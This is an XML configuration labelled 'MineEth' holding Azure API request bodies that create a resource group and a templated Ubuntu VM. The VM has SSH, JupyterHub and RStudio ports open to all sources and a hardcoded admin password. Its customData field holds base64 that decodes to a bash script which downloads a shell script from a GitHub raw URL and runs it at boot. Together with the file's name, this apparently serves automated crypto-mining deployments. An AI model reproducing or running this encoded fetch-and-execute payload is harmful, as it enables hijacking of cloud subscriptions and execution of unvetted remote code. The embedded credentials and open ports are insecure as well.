<?xml version="1.0"?>
<azure id = "MineEth">          
           
    <setting id = "GROUP">
        {"requests":[{"content":{"name":"az701vb","location":"eastus","tags":{}},"httpMethod":"PUT","name":"204bb87a-3034-4ad4-9e65-87680d{RANDOM}","requestHeaderDetails":{"commandName":"HubsExtension.Deploy.createRG"},"url":"/subscriptions/{SUBID}/resourceGroups/az701vb?api-version=2014-04-01-preview"}]}                      
    </setting>
         
    <setting id = "CREATE">{
   "requests":[
      {
         "content":{
            "properties":{
               "mode":"incremental",
               "debugSetting":{
                  "detailLevel":"none"
               },
               "parameters":{
                  "location":{
                     "value":"{LOCATION}"
                  },
                  "networkInterfaceName":{
                     "value":"{VMNAME}344"
                  },
                  "networkSecurityGroupName":{
                     "value":"{VMNAME}-nsg"
                  },
                  "networkSecurityGroupRules":{
                     "value":[
                        {
                           "name":"SSH",
                           "properties":{
                              "priority":1010,
                              "protocol":"TCP",
                              "access":"Allow",
                              "direction":"Inbound",
                              "sourceApplicationSecurityGroups":[
                                 
                              ],
                              "destinationApplicationSecurityGroups":[
                                 
                              ],
                              "sourceAddressPrefix":"*",
                              "sourcePortRange":"*",
                              "destinationAddressPrefix":"*",
                              "destinationPortRange":"22"
                           }
                        },
                        {
                           "name":"JupyterHub",
                           "properties":{
                              "priority":1020,
                              "protocol":"TCP",
                              "access":"Allow",
                              "direction":"Inbound",
                              "sourceApplicationSecurityGroups":[
                                 
                              ],
                              "destinationApplicationSecurityGroups":[
                                 
                              ],
                              "sourceAddressPrefix":"*",
                              "sourcePortRange":"*",
                              "destinationAddressPrefix":"*",
                              "destinationPortRange":"8000"
                           }
                        },
                        {
                           "name":"RStudio_Server",
                           "properties":{
                              "priority":1030,
                              "protocol":"TCP",
                              "access":"Allow",
                              "direction":"Inbound",
                              "sourceApplicationSecurityGroups":[
                                 
                              ],
                              "destinationApplicationSecurityGroups":[
                                 
                              ],
                              "sourceAddressPrefix":"*",
                              "sourcePortRange":"*",
                              "destinationAddressPrefix":"*",
                              "destinationPortRange":"8787"
                           }
                        }
                     ]
                  },
                  "subnetName":{
                     "value":"default"
                  },
                  "virtualNetworkName":{
                     "value":"{VMNAME}vnet913"
                  },
                  "addressPrefixes":{
                     "value":[
                        "10.1.0.0/16"
                     ]
                  },
                  "subnets":{
                     "value":[
                        {
                           "name":"default",
                           "properties":{
                              "addressPrefix":"10.1.0.0/24"
                           }
                        }
                     ]
                  },
                  "publicIpAddressName":{
                     "value":"{VMNAME}-ip"
                  },
                  "publicIpAddressType":{
                     "value":"Dynamic"
                  },
                  "publicIpAddressSku":{
                     "value":"Basic"
                  },
                  "virtualMachineName":{
                     "value":"{VMNAME}"
                  },
                  "virtualMachineComputerName":{
                     "value":"{VMNAME}"
                  },
                  "virtualMachineRG":{
                     "value":"az701vb"
                  },
                  "osDiskType":{
                     "value":"Premium_LRS"
                  },
                  "virtualMachineSize":{
                     "value":"{VMSIZE}"
                  },
                  "adminUsername":{
                     "value":"quantri"
                  },
                  "adminPassword":{
                     "value":"nfyr!3jdhey45"
                  },
                  "customData":{
                     "value":"IyEvYmluL2Jhc2gKd2dldCAtTyB4eHguc2ggaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3RodWNuaDk2YnVja2V0L3J0bS9tYWluL2RvY2tlcmZpbGUuc2ggJiYgY2htb2QgK3ggeHh4LnNoICYmIGJhc2ggLi94eHguc2g="
                  }
               },
               "template":{
                  "$schema":"http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                  "contentVersion":"1.0.0.0",
                  "parameters":{
                     "location":{
                        "type":"string"
                     },
                     "networkInterfaceName":{
                        "type":"string"
                     },
                     "networkSecurityGroupName":{
                        "type":"string"
                     },
                     "networkSecurityGroupRules":{
                        "type":"array"
                     },
                     "subnetName":{
                        "type":"string"
                     },
                     "virtualNetworkName":{
                        "type":"string"
                     },
                     "addressPrefixes":{
                        "type":"array"
                     },
                     "subnets":{
                        "type":"array"
                     },
                     "publicIpAddressName":{
                        "type":"string"
                     },
                     "publicIpAddressType":{
                        "type":"string"
                     },
                     "publicIpAddressSku":{
                        "type":"string"
                     },
                     "virtualMachineName":{
                        "type":"string"
                     },
                     "virtualMachineComputerName":{
                        "type":"string"
                     },
                     "virtualMachineRG":{
                        "type":"string"
                     },
                     "osDiskType":{
                        "type":"string"
                     },
                     "virtualMachineSize":{
                        "type":"string"
                     },
                     "adminUsername":{
                        "type":"string"
                     },
                     "adminPassword":{
                        "type":"secureString"
                     },
                     "customData":{
                        "type":"secureString"
                     }
                  },
                  "variables":{
                     "nsgId":"[resourceId(resourceGroup().name, 'Microsoft.Network/networkSecurityGroups', parameters('networkSecurityGroupName'))]",
                     "vnetId":"[resourceId(resourceGroup().name,'Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]",
                     "subnetRef":"[concat(variables('vnetId'), '/subnets/', parameters('subnetName'))]"
                  },
                  "resources":[
                     {
                        "name":"[parameters('networkInterfaceName')]",
                        "type":"Microsoft.Network/networkInterfaces",
                        "apiVersion":"2018-10-01",
                        "location":"[parameters('location')]",
                        "dependsOn":[
                           "[concat('Microsoft.Network/networkSecurityGroups/', parameters('networkSecurityGroupName'))]",
                           "[concat('Microsoft.Network/virtualNetworks/', parameters('virtualNetworkName'))]",
                           "[concat('Microsoft.Network/publicIpAddresses/', parameters('publicIpAddressName'))]"
                        ],
                        "properties":{
                           "ipConfigurations":[
                              {
                                 "name":"ipconfig1",
                                 "properties":{
                                    "subnet":{
                                       "id":"[variables('subnetRef')]"
                                    },
                                    "privateIPAllocationMethod":"Dynamic",
                                    "publicIpAddress":{
                                       "id":"[resourceId(resourceGroup().name, 'Microsoft.Network/publicIpAddresses', parameters('publicIpAddressName'))]"
                                    }
                                 }
                              }
                           ],
                           "networkSecurityGroup":{
                              "id":"[variables('nsgId')]"
                           }
                        }
                     },
                     {
                        "name":"[parameters('networkSecurityGroupName')]",
                        "type":"Microsoft.Network/networkSecurityGroups",
                        "apiVersion":"2019-02-01",
                        "location":"[parameters('location')]",
                        "properties":{
                           "securityRules":"[parameters('networkSecurityGroupRules')]"
                        }
                     },
                     {
                        "name":"[parameters('virtualNetworkName')]",
                        "type":"Microsoft.Network/virtualNetworks",
                        "apiVersion":"2020-11-01",
                        "location":"[parameters('location')]",
                        "properties":{
                           "addressSpace":{
                              "addressPrefixes":"[parameters('addressPrefixes')]"
                           },
                           "subnets":"[parameters('subnets')]"
                        }
                     },
                     {
                        "name":"[parameters('publicIpAddressName')]",
                        "type":"Microsoft.Network/publicIpAddresses",
                        "apiVersion":"2019-02-01",
                        "location":"[parameters('location')]",
                        "properties":{
                           "publicIpAllocationMethod":"[parameters('publicIpAddressType')]"
                        },
                        "sku":{
                           "name":"[parameters('publicIpAddressSku')]"
                        }
                     },
                     {
                        "name":"[parameters('virtualMachineName')]",
                        "type":"Microsoft.Compute/virtualMachines",
                        "apiVersion":"2021-03-01",
                        "location":"[parameters('location')]",
                        "dependsOn":[
                           "[concat('Microsoft.Network/networkInterfaces/', parameters('networkInterfaceName'))]"
                        ],
                        "properties":{
                           "hardwareProfile":{
                              "vmSize":"[parameters('virtualMachineSize')]"
                           },
                           "storageProfile":{
                              "osDisk":{
                                 "createOption":"fromImage",
                                 "managedDisk":{
                                    "storageAccountType":"[parameters('osDiskType')]"
                                 }
                              },
                              "imageReference":{
                                 "sku":"18.04-LTS",
                                 "publisher":"Canonical",
                                 "version":"latest",
                                 "offer":"UbuntuServer"
                              }
                           },
                           "networkProfile":{
                              "networkInterfaces":[
                                 {
                                    "id":"[resourceId('Microsoft.Network/networkInterfaces', parameters('networkInterfaceName'))]"
                                 }
                              ]
                           },
                           "osProfile":{
                              "computerName":"[parameters('virtualMachineComputerName')]",
                              "adminUsername":"[parameters('adminUsername')]",
                              "adminPassword":"[parameters('adminPassword')]",
                              "linuxConfiguration":{
                                 "patchSettings":{
                                    "patchMode":"ImageDefault"
                                 }
                              },
                              "customData":"[parameters('customData')]"
                           },
                          
                           "diagnosticsProfile":{
                              "bootDiagnostics":{
                                 "enabled":true
                              }
                           }
                        }
                     }
                  ],
                  "outputs":{
                     "adminUsername":{
                        "type":"string",
                        "value":"[parameters('adminUsername')]"
                     }
                  }
               },
               "validationLevel":"Template"
            },
            "tags":{
               "primaryResourceId":"/subscriptions/{SUBID}/resourcegroups/az701vb/providers/Microsoft.Compute/virtualMachines/{VMNAME}",
               "marketplaceItemId":"microsoft-dsvm.ubuntu-18041804",
               "provisioningHash":"SolutionProvider"
            }
         },
         "httpMethod":"PUT",
         "name":"{SUBID}",
         "requestHeaderDetails":{
            "commandName":"Microsoft_Azure_Compute.Deploy.submitDeployment"
         },
         "url":"/subscriptions/{SUBID}/resourceGroups/az701vb/providers/Microsoft.Resources/deployments/CreateVm-microsoft-dsvm.{VMNAME}?api-version=2020-06-01"
      }
   ]
}</setting>
</azure>
